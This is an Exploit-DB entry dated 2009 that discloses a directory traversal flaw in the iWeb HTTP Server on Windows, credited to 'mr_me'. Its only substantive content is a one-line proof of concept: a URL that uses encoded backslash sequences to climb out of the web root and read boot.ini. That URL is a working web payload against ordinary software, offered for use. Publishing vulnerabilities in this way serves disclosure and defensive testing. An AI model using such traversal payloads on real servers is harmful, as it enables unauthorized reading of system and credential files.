iWeb HTTP Server - Directory Traversal

EDB-ID:

10331

CVE:

N/A


Author:

mr_me

Type:

webapps


Platform:

Windows

Date:

2009-12-06


#################################################################
#
# iWeb HTTP server Directory Transversal Vulnerability
# Found By: mr_me
# Download: http://www.ashleybrown.co.uk/iweb/
# Tested On: Windows XPSP3
#
#################################################################

POC:

http://server/..%5C..%5C..%5Cboot.ini